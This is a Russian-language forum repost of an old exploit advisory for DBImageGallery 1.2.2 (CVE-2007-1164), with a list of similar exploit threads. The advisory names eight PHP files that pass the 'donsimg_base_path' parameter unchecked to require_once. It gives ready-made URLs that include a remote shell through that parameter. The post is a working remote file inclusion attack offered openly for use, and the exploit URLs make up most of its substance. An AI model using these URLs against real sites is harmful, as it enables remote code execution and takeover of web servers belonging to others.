Exploit DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3353
Проверка EDB
  1. Пройдено
Автор
DENVEN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1164
Дата публикации
2007-02-21
Код: 
DBImageGallery 1.2.2
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:
 
admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Google Chrome < 31.0.1650.48 - HTTP 1xx base::StringTokenizerT<...>::QuickGetNext Out-of-Bounds Read
Ответы
0
Просмотры
644
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitrary Code Execution
Ответы
0
Просмотры
422
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
374
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
383
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
392
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
387
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_time.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_sensor.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
381
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ports.php?base_path' Remote File Inclusion
Ответы
0
Просмотры
374
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу